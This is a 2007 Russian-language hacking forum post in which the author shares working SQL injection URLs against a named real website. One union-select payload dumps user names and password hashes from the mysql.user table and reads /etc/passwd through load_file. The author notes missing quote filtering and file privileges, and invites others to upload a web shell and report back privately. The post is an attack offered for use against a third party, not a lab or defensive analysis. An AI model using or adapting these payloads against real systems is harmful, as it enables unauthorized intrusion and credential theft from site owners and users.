11.08.2007, 13:55
|
|
Познающий
Регистрация: 05.08.2007
Сообщений: 30
С нами:
9876886
Репутация:
18
|
|
Вот копался по сайтам, жомил на всякую рекламу и наткнулся на слабый по хар-кам, но интересный по скулям сайтец. Нашел несколько штук, воспользуюсь только одной
http://mgrant.ru/safe_gl.php?safeid=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
Ну вроде бы обычная скуля, ничего примечательного, однако:
Кавычки не фильтруются
есть file priv...
есть доступ к mysql.user
http://mgrant.ru/safe_gl.php?safeid=-1+union+select+1,2,user,password,load_file('/etc/passwd'),6,7,8,9,10+from+mysql.user+limit+0,1/*
Кто зальет шелл стукните в личку/аську, я чего-то там недогнал немнога, юзеры все лежат в /etc/passwd, в httpd только путь.
Удачи =)
PS: версия четвертая, таблы не просмотреть, я там нашел парочку, уже не помню названия, логины и пароли ни к чему не подходят. |
|
|